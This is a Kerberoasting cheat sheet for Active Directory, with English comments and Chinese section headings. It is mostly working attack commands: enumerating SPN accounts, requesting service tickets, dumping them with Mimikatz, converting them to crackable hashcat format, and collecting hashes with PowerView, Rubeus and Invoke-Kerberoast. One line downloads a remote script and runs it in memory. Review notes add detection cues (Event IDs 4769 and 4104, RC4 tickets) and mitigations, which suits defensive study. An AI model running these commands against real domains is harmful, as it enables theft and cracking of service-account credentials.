# Get Kerberoastable users
# Three ways to enumerate accounts that carry a ServicePrincipalName (the pre-condition
# for Kerberoasting). Only the enumeration happens here; no tickets are requested yet.
setspn.exe -Q */*                                    # This is a built-in binary. Focus on user accounts
Get-NetUser -SPN | select serviceprincipalname       # Powerview
.\Rubeus.exe kerberoast /stats
# NOTE(review): SPN enumeration itself is an ordinary LDAP query and is hard to distinguish
# from admin activity; the detectable step is the follow-on service-ticket requests
# (Security Event ID 4769 on the DC, many distinct SPNs from one account in a short window,
# commonly with RC4 ticket encryption type 0x17). Mitigation on the account side: long random
# or managed (gMSA) passwords for every user account that holds an SPN.
技术 1: 请求TGS并从内存中转储
# Get TGS in memory from a single user
# Loads the .NET Kerberos requestor and asks the KDC for a service ticket for one SPN;
# the ticket lands in the current logon session's ticket cache (see klist below).
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName"
# Example: MSSQLSvc/mgmt.domain.local

# Get TGSs for ALL kerberoastable accounts (PCs included, not really smart)
# Parses the setspn output line after each '^CN' match as an SPN and requests a ticket for each.
# Machine-account tickets are included, which only adds noise (and 4769 events) for the operator.
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

# List kerberos tickets in memory
klist

# Extract them from memory
Invoke-Mimikatz -Command '"kerberos::list /export"'    # Export tickets to current folder (.kirbi files)
# NOTE(review): in-memory Invoke-Mimikatz is the loudest step of this sequence; PowerShell
# script block logging (Event ID 4104) and AMSI are the usual places it surfaces.

# Transform kirbi ticket to john
python2.7 kirbi2john.py sqldev.kirbi

# Transform john to hashcat
# Rewrites the john "$krb5tgs$<name>:<hash>" line into the hashcat "$krb5tgs$23$*<name>*$<hash>"
# layout; the literal 23 is the etype (RC4-HMAC) and is the detail defenders key on.
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
技术 2: 自动化工具
# Powerview: Get Kerberoast hash of a user
Request-SPNTicket -SPN "<SPN>" -Format Hashcat     # Using PowerView Ex: MSSQLSvc/mgmt.domain.local
# Powerview: Get all Kerberoast hashes
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast    # Specific user
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap            # Only accounts with adminCount=1
# NOTE(review): adminCount=1 is set by AdminSDHolder on (current or former) members of protected
# groups, so these are the highest-value SPN accounts; from a hardening standpoint they are the
# first ones to move to gMSA or to AES-only, long random passwords.

# Invoke-Kerberoast
# Download-and-execute of a script straight from a public URL into the current process —
# the classic iex/DownloadString pattern that script block logging and AMSI are tuned for.
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
# -Encoding ASCII: Windows PowerShell's Out-File default is UTF-16, which the cracker will not parse.
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast